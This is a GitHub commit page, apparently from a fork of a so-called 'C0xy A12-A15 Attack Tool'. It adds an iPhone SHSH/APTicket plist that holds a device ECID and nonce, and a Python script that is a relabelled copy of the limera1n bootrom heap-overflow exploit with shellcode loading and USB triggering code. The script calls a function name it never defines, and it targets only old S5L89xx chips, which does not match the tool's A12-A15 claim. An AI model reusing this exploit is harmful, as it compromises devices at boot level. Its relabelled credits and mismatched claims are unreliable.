forked from TechC0xy/C0xy-A12-A15-Attack-Tool
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
7 changed files
with
475 additions
and
0 deletions.
There are no files selected for viewing
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,148 @@ | ||
| <?xml version="1.0" encoding="UTF-8"?> | ||
| <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | ||
| <plist version="1.0"> | ||
| <dict> | ||
| <key>@ServerVersion</key> | ||
| <string>2.1.0</string> | ||
| <key>ApImg4Ticket</key> | ||
| <data> | ||
| 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 | ||
| </data> | ||
| <key>generator</key> | ||
| <string>0xebaf8d883c95e4bc</string> | ||
| <key>parametersLog</key> | ||
| <dict> | ||
| <key>time</key> | ||
| <integer>1631695994</integer> | ||
| <key>ecid</key> | ||
| <integer>6553244457592</integer> | ||
| <key>nonce</key> | ||
| <string>d08acd07f3fa5dfb60bd60d63bc03b31c9062030</string> | ||
| <key>productType</key> | ||
| <string>iPhone8,2</string> | ||
| <key>productVersion</key> | ||
| <string>14.7.1</string> | ||
| <key>buildVersion</key> | ||
| <string>18G82</string> | ||
| </dict> | ||
| </dict> | ||
| </plist> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,228 @@ | ||
| # Credit: This file is based on c0xy exploit (heap overflow) by geohot. | ||
|
|
||
| import array, ctypes, struct, sys, time | ||
| import usb # pyusb: use 'pip install pyusb' to install this module | ||
| import dfu | ||
|
|
||
| # Must be global so garbage collector never frees it | ||
| request = None | ||
| transfer_ptr = None | ||
|
|
||
| constants_359_3 = [ | ||
| 0x84031800, # 1 - RELOCATE_SHELLCODE_ADDRESS | ||
| 1024, # 2 - RELOCATE_SHELLCODE_SIZE | ||
| 0x83d4, # 3 - memmove | ||
| 0x84034000, # 4 - MAIN_STACK_ADDRESS | ||
| 0x43c9, # 5 - nor_power_on | ||
| 0x84024228, # 12 - gLeakingDFUBuffer | ||
| 0x5ded, # 6 - nor_init | ||
| 0x84024820, # 7 - gUSBSerialNumber | ||
| 0x8e7d, # 8 - strlcat | ||
| 0x349d, # 9 - usb_wait_for_image | ||
| 0x84000000, # 10 - LOAD_ADDRESS | ||
| 0x24000, # 11 - MAX_SIZE | ||
| 0x1ccd, # 13 - free | ||
| 0x65786563, # 14 - EXEC_MAGIC | ||
| 0x1f79, # 15 - memz_create | ||
| 0x3969, # 16 - jump_to | ||
| 0x1fa1, # 17 - memz_destroy | ||
| 0x60, # 18 - IMAGE3_LOAD_SP_OFFSET | ||
| 0x50, # 19 - IMAGE3_LOAD_STRUCT_OFFSET | ||
| 0x1fe5, # 20 - image3_create_struct | ||
| 0x2655, # 21 - image3_load_continue | ||
| 0x277b, # 22 - image3_load_fail | ||
| ] | ||
|
|
||
| constants_359_3_2 = [ | ||
| 0x84031800, # 1 - RELOCATE_SHELLCODE_ADDRESS | ||
| 1024, # 2 - RELOCATE_SHELLCODE_SIZE | ||
| 0x83dc, # 3 - memmove | ||
| 0x84034000, # 4 - MAIN_STACK_ADDRESS | ||
| 0x43d1, # 5 - nor_power_on | ||
| 0x5df5, # 6 - nor_init | ||
| 0x84024820, # 7 - gUSBSerialNumber | ||
| 0x8e85, # 8 - strlcat | ||
| 0x34a5, # 9 - usb_wait_for_image | ||
| 0x84000000, # 10 - LOAD_ADDRESS | ||
| 0x24000, # 11 - MAX_SIZE | ||
| 0x84024228, # 12 - gLeakingDFUBuffer | ||
| 0x1ccd, # 13 - free | ||
| 0x65786563, # 14 - EXEC_MAGIC | ||
| 0x1f81, # 15 - memz_create | ||
| 0x3971, # 16 - jump_to | ||
| 0x1fa9, # 17 - memz_destroy | ||
| 0x60, # 18 - IMAGE3_LOAD_SP_OFFSET | ||
| 0x50, # 19 - IMAGE3_LOAD_STRUCT_OFFSET | ||
| 0x1fed, # 20 - image3_create_struct | ||
| 0x265d, # 21 - image3_load_continue | ||
| 0x2783, # 22 - image3_load_fail | ||
| ] | ||
|
|
||
| constants_359_5 = [ | ||
| 0x84031800, # 1 - RELOCATE_SHELLCODE_ADDRESS | ||
| 1024, # 2 - RELOCATE_SHELLCODE_SIZE | ||
| 0x8564, # 3 - memmove | ||
| 0x84034000, # 4 - MAIN_STACK_ADDRESS | ||
| 0x43b9, # 5 - nor_power_on | ||
| 0x5f75, # 6 - nor_init | ||
| 0x84024750, # 7 - gUSBSerialNumber | ||
| 0x901d, # 8 - strlcat | ||
| 0x36e5, # 9 - usb_wait_for_image | ||
| 0x84000000, # 10 - LOAD_ADDRESS | ||
| 0x24000, # 11 - MAX_SIZE | ||
| 0x84024158, # 12 - gLeakingDFUBuffer | ||
| 0x1a51, # 13 - free | ||
| 0x65786563, # 14 - EXEC_MAGIC | ||
| 0x1f25, # 15 - memz_create | ||
| 0x39dd, # 16 - jump_to | ||
| 0x1f0d, # 17 - memz_destroy | ||
| 0x64, # 18 - IMAGE3_LOAD_SP_OFFSET | ||
| 0x60, # 19 - IMAGE3_LOAD_STRUCT_OFFSET | ||
| 0x2113, # 20 - image3_create_struct | ||
| 0x2665, # 21 - image3_load_continue | ||
| 0x276d, # 22 - image3_load_fail | ||
| ] | ||
|
|
||
| constants_574_4 = [ | ||
| 0x84039800, # 1 - RELOCATE_SHELLCODE_ADDRESS | ||
| 1024, # 2 - RELOCATE_SHELLCODE_SIZE | ||
| 0x84dc, # 3 - memmove | ||
| 0x8403c000, # 4 - MAIN_STACK_ADDRESS | ||
| 0x4e8d, # 5 - nor_power_on | ||
| 0x690d, # 6 - nor_init | ||
| 0x8402e0e0, # 7 - gUSBSerialNumber | ||
| 0x90c9, # 8 - strlcat | ||
| 0x4c85, # 9 - usb_wait_for_image | ||
| 0x84000000, # 10 - LOAD_ADDRESS | ||
| 0x2c000, # 11 - MAX_SIZE | ||
| 0x8402dbcc, # 12 - gLeakingDFUBuffer | ||
| 0x3b95, # 13 - free | ||
| 0x65786563, # 14 - EXEC_MAGIC | ||
| 0x7469, # 15 - memz_create | ||
| 0x5a5d, # 16 - jump_to | ||
| 0x7451, # 17 - memz_destroy | ||
| 0x68, # 18 - IMAGE3_LOAD_SP_OFFSET | ||
| 0x64, # 19 - IMAGE3_LOAD_STRUCT_OFFSET | ||
| 0x412d, # 20 - image3_create_struct | ||
| 0x46db, # 21 - image3_load_continue | ||
| 0x47db, # 22 - image3_load_fail | ||
| ] | ||
|
|
||
| class DeviceConfig: | ||
| def __init__(self, version, cpid, exploit_lr, max_size, constants): | ||
| self.version = version | ||
| self.cpid = cpid | ||
| self.exploit_lr = exploit_lr | ||
| self.max_size = max_size | ||
| self.constants = constants | ||
|
|
||
| configs = [ | ||
| DeviceConfig('359.3', '8920', 0x84033FA4, 0x24000, constants_359_3), # S5L8920 (old bootrom) | ||
| DeviceConfig('359.3.2', '8920', 0x84033FA4, 0x24000, constants_359_3_2), # S5L8920 (new bootrom) | ||
| DeviceConfig('359.5', '8922', 0x84033F98, 0x24000, constants_359_5), # S5L8922 | ||
| DeviceConfig('574.4', '8930', 0x8403BF9C, 0x2C000, constants_574_4), # S5L8930 | ||
| ] | ||
|
|
||
| def create_control_transfer(device, request, timeout): | ||
| ptr = usb.backend.libusb1._lib.libusb_alloc_transfer(0) | ||
| assert ptr is not None | ||
|
|
||
| transfer = ptr.contents | ||
| transfer.dev_handle = device._ctx.handle.handle | ||
| transfer.endpoint = 0 # EP0 | ||
| transfer.type = 0 # LIBUSB_TRANSFER_TYPE_CONTROL | ||
| transfer.timeout = timeout | ||
| transfer.buffer = request.buffer_info()[0] # C-pointer to request buffer | ||
| transfer.length = len(request) | ||
| transfer.user_data = None | ||
| transfer.callback = usb.backend.libusb1._libusb_transfer_cb_fn_p(0) # NULL | ||
| transfer.flags = 1 << 1 # LIBUSB_TRANSFER_FREE_BUFFER | ||
|
|
||
| return ptr | ||
|
|
||
| def c0xy_libusb1_async_ctrl_transfer(device, bmRequestType, bRequest, wValue, wIndex, data, timeout): | ||
| if usb.backend.libusb1._lib is not device._ctx.backend.lib: | ||
| print 'ERROR: This exploit requires libusb1 backend, but another backend is being used. Exiting.' | ||
| sys.exit(1) | ||
|
|
||
| request = array.array('B', struct.pack('<BBHHH', bmRequestType, bRequest, wValue, wIndex, len(data)) + data) | ||
| transfer_ptr = create_control_transfer(device, request, timeout) | ||
| assert usb.backend.libusb1._lib.libusb_submit_transfer(transfer_ptr) == 0 | ||
|
|
||
| time.sleep(timeout / 1000.0) | ||
|
|
||
| # Prototype of libusb_cancel_transfer is missing from pyusb | ||
| usb.backend.libusb1._lib.libusb_cancel_transfer.argtypes = [ctypes.POINTER(usb.backend.libusb1._libusb_transfer)] | ||
| assert usb.backend.libusb1._lib.libusb_cancel_transfer(transfer_ptr) == 0 | ||
|
|
||
| def generate_payload(constants, exploit_lr): | ||
| with open('bin/c0xy-shellcode.bin', 'rb') as f: | ||
| shellcode = f.read() | ||
|
|
||
| # Shellcode has placeholder values for constants; check they match and replace with constants from config | ||
| placeholders_offset = len(shellcode) - 4 * len(constants) | ||
| for i in range(len(constants)): | ||
| offset = placeholders_offset + 4 * i | ||
| (value,) = struct.unpack('<I', shellcode[offset:offset + 4]) | ||
| assert value == 0xBAD00001 + i | ||
|
|
||
| shellcode_address = 0x84000400 + 1 | ||
| heap_block = struct.pack('<4I48s', 0x405, 0x101, shellcode_address, exploit_lr, '\xCC' * 48) | ||
| return heap_block * 16 + shellcode[:placeholders_offset] + struct.pack('<%sI' % len(constants), *constants) | ||
|
|
||
| def exploit(): | ||
| print '*** based on limera1n exploit (heap overflow) by geohot ***' | ||
|
|
||
| device = dfu.acquire_device() | ||
| print 'Found:', device.serial_number | ||
|
|
||
| if 'PWND:[' in device.serial_number: | ||
| print 'Device is already in pwned DFU Mode. Not executing exploit.' | ||
| return | ||
|
|
||
| chosenConfig = None | ||
| for config in configs: | ||
| if 'SRTG:[iBoot-%s]' % config.version in device.serial_number: | ||
| chosenConfig = config | ||
| break | ||
| if chosenConfig is None: | ||
| for config in configs: | ||
| if 'CPID:%s' % config.cpid in device.serial_number: | ||
| print 'ERROR: CPID is compatible, but serial number string does not match.' | ||
| print 'Make sure device is in SecureROM DFU Mode and not LLB/iBSS DFU Mode. Exiting.' | ||
| sys.exit(1) | ||
| print 'ERROR: Not a compatible device. This exploit is for S5L8920/S5L8922/S5L8930 devices only. Exiting.' | ||
| sys.exit(1) | ||
|
|
||
| dfu.send_data(device, generate_payload(chosenConfig.constants, chosenConfig.exploit_lr)) | ||
|
|
||
| assert len(device.ctrl_transfer(0xA1, 1, 0, 0, 1, 1000)) == 1 | ||
|
|
||
| limera1n_libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 10) | ||
|
|
||
| try: | ||
| device.ctrl_transfer(0x21, 2, 0, 0, 0, 10) | ||
| print 'ERROR: This request succeeded, but it should have raised an exception. Exiting.' | ||
| sys.exit(1) | ||
| except usb.core.USBError: | ||
| # OK: This request should have raised USBError. | ||
| pass | ||
|
|
||
| dfu.usb_reset(device) | ||
| dfu.release_device(device) | ||
|
|
||
| device = dfu.acquire_device() | ||
| dfu.request_image_validation(device) | ||
| dfu.release_device(device) | ||
|
|
||
| time.sleep(0.5) | ||
|
|
||
| device = dfu.acquire_device() | ||
| failed = 'PWND:[c0xy]' not in device.serial_number | ||
| dfu.release_device(device) | ||
|
|
||
| if failed: | ||
| print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.' | ||
| sys.exit(1) | ||
|
|
||
| print 'Device is now in pwned DFU Mode.' |
Oops, something went wrong.